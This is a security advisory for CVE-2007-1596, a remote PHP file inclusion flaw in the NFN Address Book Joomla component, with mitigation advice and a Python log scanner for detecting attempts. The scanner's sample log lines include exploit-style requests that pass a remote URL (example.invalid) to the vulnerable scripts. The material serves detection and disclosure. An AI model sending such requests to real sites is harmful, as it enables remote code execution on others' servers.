PT-2007-2978 · Nfn · Nfn Address Book
Cold Zero · Published 2007-03-22 · Updated 2017-10-11
CVE-2007-1596
CVSS v2.0: 9.3 (High)
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C
Name of the Vulnerable Software and Affected Versions
NFN Address Book (com_nfn_addressbook) version 0.4
Description
The issue allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter to specific API endpoints, such as "/components/com_nfn_addressbook/nfnaddressbook.php" or "/administrator/components/com_nfn_addressbook/nfnaddressbook.php".
Recommendations
For NFN Address Book (com_nfn_addressbook) version 0.4, consider restricting access to the mosConfig_absolute_path parameter in the affected API endpoints until a patch is available. As a temporary workaround, avoid using the mosConfig_absolute_path parameter in the "/components/com_nfn_addressbook/nfnaddressbook.php" and "/administrator/components/com_nfn_addressbook/nfnaddressbook.php" endpoints to minimize the risk of exploitation.
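While the restriction above is being put in place, web server access logs can be reviewed for requests that supply this parameter to the two affected scripts. The Python sketch below is an added example, not part of the original advisory: it assumes Combined Log Format, and the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Script paths named in the advisory; endswith() also covers sub-directory installs.
AFFECTED = (
    "/components/com_nfn_addressbook/nfnaddressbook.php",
    "/administrator/components/com_nfn_addressbook/nfnaddressbook.php",
)
PARAM = "mosconfig_absolute_path"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# URL scheme of two or more characters (so "C:" drive letters do not match) or "//host".
REMOTE_RE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]+:|//)", re.I)

# Constructed sample lines (documentation addresses, example.invalid host).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?option=com_nfn_addressbook HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=http://example.invalid/a.txt HTTP/1.1" 200 312',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /site/administrator/components/com_nfn_addressbook/nfnaddressbook.php?MOSCONFIG_ABSOLUTE_PATH=http%253A%252F%252Fexample.invalid%252Fa.txt HTTP/1.1" 200 312',
    '203.0.113.4 - - [01/Jan/2024:10:01:00 +0000] "GET /components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=/var/www/html HTTP/1.1" 200 98',
]


def classify(line):
    """Return 'remote', 'present' or None for one access-log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    try:
        target = urlsplit(m.group(1))
    except ValueError:  # malformed request target
        return None
    if not unquote(target.path).lower().endswith(AFFECTED):
        return None
    verdict = None
    for key, value in parse_qsl(target.query, keep_blank_values=True):
        if key.lower() != PARAM:
            continue
        # The parameter should never be client-supplied, so its presence alone is worth a look.
        verdict = verdict or "present"
        # parse_qsl decoded once; decode again so a double-encoded URL is still recognised.
        if REMOTE_RE.match(value) or REMOTE_RE.match(unquote(value)):
            verdict = "remote"
    return verdict


def scan(lines):
    """Return (line_number, verdict) for every line that needs review."""
    return [(n, v) for n, line in enumerate(lines, 1) if (v := classify(line))]
```

Lines reported as 'remote' carry a URL in the parameter; 'present' means the parameter was supplied with a non-URL value, which is still abnormal for a client request.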
Affected Products
Nfn Address Book